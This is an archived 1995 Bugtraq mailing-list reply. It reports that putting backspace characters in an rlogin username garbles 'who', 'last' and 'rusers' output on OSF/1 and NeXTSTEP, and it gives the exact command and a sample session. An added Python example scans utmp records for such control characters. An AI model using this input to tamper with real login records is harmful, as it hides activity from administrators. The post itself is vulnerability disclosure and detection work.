Bugtraq mailing list archives

Re: rlogin can be used to change finger information


From: tfs () vampire science gmu edu (Tim Scanlon)
Date: Fri, 2 Jun 95 23:02:52 -0400


Casper Dik <casper () Holland Sun COM> wrote:
|This is a flaw common to systems that have rlogind do the authentication.
|Sun systems use the older method of letting login handle the rlogin
|protocol.  If rlogind handles the protocol, the username argument
|gets passed on the commandline.
|If login handles the protocol, the username
|can take any shape or form but will only be handled as username.

Some OSes also have another problem with this. You can also
really do rather ugly things to the display listing of
"who" and "last" via this bug. I have tested this on
OSF 1 V3.2 17 alpha, and NeXTSTEP 3.0-3.3. I imagine that
other OSes have a problem with it too.

Basically, you "rlogin hostname -l -h^H^H^H^H^H^H" with as many
ctrl-H's as the OS will accept. (You get the backspaces by
a ctrl-V ctrl-H sequence.)

The result is interesting. On OSF "who" gets totally munged
up. I believe DEC may have a patch for it now, (as 2 days
after I tested this locally, it was suddenly "fixed"... :O )
On NeXTs, it's less of a mess, but not by much. Here is
a sample session:

vampire:10> rlogin vampire -l -h^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H
login: tfs
Password:
Last login: Fri Jun  2 22:34:11 from
vampire:1> who
tfs      console Jun  2 04:19
tfs      ttyp1   Jun  2 04:22
tfs      ttyp2   Jun  2 04:22
tfs      ttyp3   Jun  2 04:22
courtney ttyp4   Jun  2 22:27   (hostname.deleted)
tfs      ttyp8   Jun  2 19:03
tfs      ttyp9   )un  2 22:35   (
vampire:2> last|more
tfs Fri Jun  2 22:35   still logged in
tfs Fri Jun  2 22:34 - 22:34  (00:00)
courtney  ttyp4    hostname.deleted Fri Jun  2 22:27   still logged in
vampire:5> rusers -l
tfs      vampire:console       Jun  2 04:19   38:40
courtney vampire:ttyp4         Jun  2 22:27      21 (hostname.deleted)
tfs      vampire:ttyp9         Jun  2)22:35         (
vampire:11> rsh vampire
Last login: Fri Jun  2 22:35:58 from
vampire:1>

You can see the result. OSF was far worse, with large chunks of
"who" and the rest not displayed....
Obviously it's not that huge a deal, but it provides some interesting
results from a security/bug perspective...

Tim Scanlon


________________________________________________________________
tfs () vampire science gmu edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession
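The posted session shows backspace characters, supplied through the rlogin username, ending up in the login-accounting records that who, last and rusers print. Rather than trusting the rendered output of those tools, a practitioner would want to scan the records themselves for control characters. The following is an added example, not code from the original post or from any of the systems it mentions; it assumes the glibc struct utmp record layout (384 bytes, as declared in utmp.h on x86-64; the BSD-derived systems in the post use a different, shorter record) and constructs two sample records inline, one clean and one carrying a run of backspaces in the host field, modelled on the posted session.

```python
"""Scan utmp/wtmp-style records for control characters in the user and host
fields, which is what produces the broken "who"/"last" output in the post.

Added example. Assumption: records follow the glibc struct utmp layout
(little-endian, 384 bytes). Other systems use different layouts.
"""
import struct
from typing import Dict, Iterator, List, Tuple

# Assumed layout (glibc utmp.h, x86-64): ut_type, 2 pad bytes, ut_pid,
# ut_line[32], ut_id[4], ut_user[32], ut_host[256], ut_exit (2 shorts),
# ut_session, ut_tv (sec, usec), ut_addr_v6[4], 20 unused bytes.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384 under the assumed layout
USER_PROCESS = 7  # ut_type value for a logged-in user session


def decode_field(raw: bytes) -> str:
    """Fixed-width, NUL-padded field -> str (latin-1 keeps every byte visible)."""
    return raw.split(b"\0", 1)[0].decode("latin-1")


def has_control_chars(text: str) -> bool:
    """True if the field contains any C0 control character or DEL."""
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in text)


def escape(text: str) -> str:
    """Render a field so control characters are visible, e.g. \\x08."""
    return text.encode("unicode_escape").decode("ascii")


def parse_utmp(blob: bytes) -> Iterator[Tuple[int, str, str, str]]:
    """Yield (ut_type, ut_line, ut_user, ut_host) for each record in blob."""
    if len(blob) % UTMP_SIZE:
        raise ValueError("blob length is not a multiple of the record size")
    for offset in range(0, len(blob), UTMP_SIZE):
        fields = struct.unpack_from(UTMP_FMT, blob, offset)
        ut_type, _pid, line, _id, user, host = fields[:6]
        yield ut_type, decode_field(line), decode_field(user), decode_field(host)


def suspicious_records(blob: bytes) -> List[Dict[str, object]]:
    """Return the USER_PROCESS records whose user or host field carries control chars."""
    hits = []
    for ut_type, line, user, host in parse_utmp(blob):
        if ut_type != USER_PROCESS:
            continue
        bad = [name for name, val in (("ut_user", user), ("ut_host", host))
               if has_control_chars(val)]
        if bad:
            hits.append({
                "line": line,
                "fields": bad,
                "escaped_user": escape(user),
                "escaped_host": escape(host),
            })
    return hits


def make_record(ut_type: int, pid: int, line: str, user: str, host: str) -> bytes:
    """Pack one record under the assumed layout (only for building test data)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode("latin-1"), b"",
                       user.encode("latin-1"), host.encode("latin-1"),
                       0, 0, 0, 0, 0, 0, 0, 0, 0, b"")


def build_sample() -> bytes:
    """Constructed sample: one normal login and one whose host field is backspaces,
    mirroring the 'ttyp9 ... (' entry in the posted session. Not real data."""
    clean = make_record(USER_PROCESS, 1001, "ttyp4", "courtney", "hostname.deleted")
    munged = make_record(USER_PROCESS, 1002, "ttyp9", "tfs", "\x08" * 12)
    return clean + munged


if __name__ == "__main__":
    for hit in suspicious_records(build_sample()):
        print(f"{hit['line']}: control chars in {hit['fields']}: "
              f"user={hit['escaped_user']!r} host={hit['escaped_host']!r}")
```

Pointing `suspicious_records` at the bytes of a real utmp or wtmp file only makes sense on a system whose record layout matches the assumed one; on anything else, adjust `UTMP_FMT` to that system's utmp.h first, since `parse_utmp` rejects a blob whose length is not a multiple of the record size rather than guessing.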


